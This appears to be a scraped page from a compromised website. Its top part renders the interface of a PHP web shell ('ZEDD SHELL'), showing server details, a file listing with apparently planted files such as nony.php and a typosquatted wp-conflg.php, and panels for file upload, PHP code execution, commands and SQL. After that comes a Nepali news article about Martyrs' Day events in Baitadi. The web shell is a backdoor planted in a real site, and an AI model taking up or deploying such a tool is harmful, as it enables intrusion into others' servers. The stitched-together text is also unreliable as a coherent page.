관리-도구

경로: /home2/nepaldsdforg/tmp

/home2/nepaldsdforg/tmp/

폴더 내용:


파일 업로드:


PHP 코드 실행:


ZEDD SHELL Uname: Linux 22b.websitewelcome.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
User: 10847 (nepaldsdforg)
Group: 9989 (nepaldsdforg)
Disable functions: NONE :)
Safe mode: On[ PHPinfo ]
      ( Reset | Go to )
sFileSizeTanggalOwner/GroupPermissionsActions
[ . ] 24 Apr 2025, 04:11 10847 0755
[ .. ] 26 Apr 2025, 02:19 10847 0750
[ backend ] 26 Jul 2023, 12:54 10847 0755 Zip | Hapus
[ css ] 26 Jul 2023, 12:54 10847 0755 Zip | Hapus
[ frontend ] 26 Jul 2023, 12:54 10847 0755 Zip | Hapus
[ js ] 26 Jul 2023, 12:54 10847 0755 Zip | Hapus
[ pages ] 26 Jul 2023, 12:54 10847 0755 Zip | Hapus
[ static_img ] 24 Apr 2025, 03:51 10847 0755 Zip | Hapus
[ storage ] 24 Apr 2025, 20:13 10847 0755 Zip | Hapus
[ uploads ] 26 Jul 2023, 12:54 10847 0755 Zip | Hapus
[ vendor ] 26 Jul 2023, 12:54 10847 0755 Zip | Hapus
.htaccess 624 b 24 Apr 2025, 04:05 10847 0444 Download | Rename | Kosong | Delete
cw1768.zip 1.82 Kb 24 Apr 2025, 03:19 10847 0644 Download | Rename | Kosong | Delete
error_log 20.26 Kb 24 Apr 2025, 03:20 10847 0644 Download | Rename | Kosong | Delete
favicon.ico 0 b 26 Jul 2023, 12:54 10847 0644 Download | Rename | Kosong | Delete
index.php 1.73 Kb 24 Apr 2025, 04:05 10847 0444 Download | Rename | Kosong | Delete
info.php 17.30 Kb 24 Apr 2025, 04:11 10847 0644 Download | Rename | Kosong | Delete
jwy.txt 1 b 24 Apr 2025, 03:19 10847 0644 Download | Rename | Kosong | Delete
mix-manifest.json 75 b 26 Jul 2023, 12:54 10847 0644 Download | Rename | Kosong | Delete
nony.php 3.50 Kb 24 Apr 2025, 04:11 10847 0644 Download | Rename | Kosong | Delete
robots.txt 965 b 26 Apr 2025, 18:38 10847 0644 Download | Rename | Kosong | Delete
web.config 1.18 Kb 26 Jul 2023, 12:54 10847 0644 Download | Rename | Kosong | Delete
wp-conflg.php 1.24 Kb 24 Apr 2025, 03:12 10847 0644 Download | Rename | Kosong | Delete

File Baru | Folder Baru
Command
SQL
?> Dalit Society Development Forum

बैतडीमा भव्यताका साथ मनाइयो सहिद दिवस

DSDF Baitadi 2024 Feb 07

बैतडीमा भव्यताका साथ मनाइयो सहिद दिवस

बैतडी
बैतडी जिल्लामा सहिद दिवसको अवसरमा विभिन्न कार्यक्रमहरु गरिएका छन् । जिल्लाको दशरथचन्द नगरपालिका–०५ बस्कोट स्थीत जेष्ठ सहिद दशरथचन्दको जन्मघरमा विहानै भव्य रुपले कार्यक्रम गरिएको छ भने, सदरमुकाम गढी स्थीत सांस्कृतिक कार्यक्रमहरु गरिएकाछन् । 

यसका साथै जिल्लाको पाटन नगरपालिका वडा न.४ स्थीत सहिद वाटिकामा कोणसभा आयोजना गरिएको छ । जिल्ला स्थीत स्थानियतह र विद्यालयहरुले आ–आफ्नै तवरले सदवस विशेष कार्यक्रमहरु गरेकाछन् । 

सहिद दिवसको अवसर पारि दशरथचन्द नगरपालिकाले नगर क्षेत्र सरसफाई गर्नुका साथै महिलाहरुका लागि १महिने लोकसेवा तयारी कक्षाको सुरुवात गरेको छ । 

इतिहासको विभिन्न कालखण्डमा प्रजातन्त्रको स्थापना, राष्ट्र निर्माण र स्वतन्त्रता सहित जनताका पक्षमा भएका आन्दोलनमा मृत्युवरण गरेका वीर सपुतहरूको सम्मानमा बैतडीमा साताव्यापी कार्यक्रम गरी शहीद दिवस मनाउने परम्परा छ । साताव्यापी कार्यक्रमको अन्तिम दिन मंगलबार बैतडीमा प्रभातफेरी सहित शहीद दशरथचन्दको जन्मघर र विभिन्न ठाउँहरुमा अवस्थीत सहिदका शालिकहरुमा माल्यार्पण गर्दै दिवस मनाइएको हो ।IMG_20531706617887.jpeg

विभिन्न कार्यक्रमहरुमा उपस्थित व्यक्तिहरुले शहीदहरुको सम्झना एवं उनिहरुले गरेको क्रान्तीको प्रसंसा गरेका छन् । सरोकारवालाहरुले अझै सम्मपनि शहीदहरुका सपना पुरा हुन नसकेकोप्रति भने चिन्ताव्यक्त गरेका छन् । 

दशरथचन्दको जन्मघरमा नेपाल प्रहरी र शसस्त्र प्रहरीले शहीदप्रति सलामी अर्पण छ ।  

सरकारले शहीद दिवस विशेष कार्यक्रम सहित मनाउने घोषणा गरे पनि सार्वजनिक विदा भने दिएको छैन ।  Patan program1706618057.jpeg

वि.सं. १९९७ माघ १० गते निरंकुश राणा शासनविरुद्धमा नेपाल प्रजापरिषद् स्थापना गरी जनतालाई आफ्नो हक र अधिकारका लागि क्रान्ति गर्न प्रेरित गर्ने शुक्रराजलाई टेकुस्थित खरीको रूखमा झुन्ड्याएर हत्या गरिएको थियो ।

यस्तै, सोही वर्ष माघ १३ गते सिफलमा धर्मभक्तलाई झुन्ड्याइएको थियो भने माघ १५ गते दशरथ चन्द र गंगालाललाई शोभा भगवतीमा गोली हानी हत्या गरिएको थियो । नेपालको पहिलो शहीद भने लखन थापालाई मानिन्छ ।

मुलुकमा पछिल्लोपटक झैझगडा र दुर्घटनामा ज्यान गुमाएका व्यक्तिलाई समेत शहीद घोषणा गर्नुपर्ने र रु १० लाख आर्थिक सहयोगका लागि दबाब दिने प्रचलनले वास्तविक शहीदको भावनामा चोट पुगेको गुनासा बढ्न थालेको छ ।

सहिदलाई प्रत्येक वर्ष माघ १६ गते सम्झने गरे पनि सपना पूरा गर्न हुनुपर्ने जति काम नभएको गुनासो यस अवसरमा हुने गरेको सुनिन्छ । यस दिन हुने औपचारिक कार्यक्रममा जिम्मेवार अधिकारीहरुबाट शहीदको सपना पूरा गर्न लागिपरेको प्रतिबद्धता भने निरन्तर आउने गरेको छ । पछिल्लो समय स्पष्ट परिभाषा नगरी शहीद घोषणा गरिएको भनी जनस्तरबाट टिप्पणी हुने गरेको छ ।

saskritik program1706618080.jpg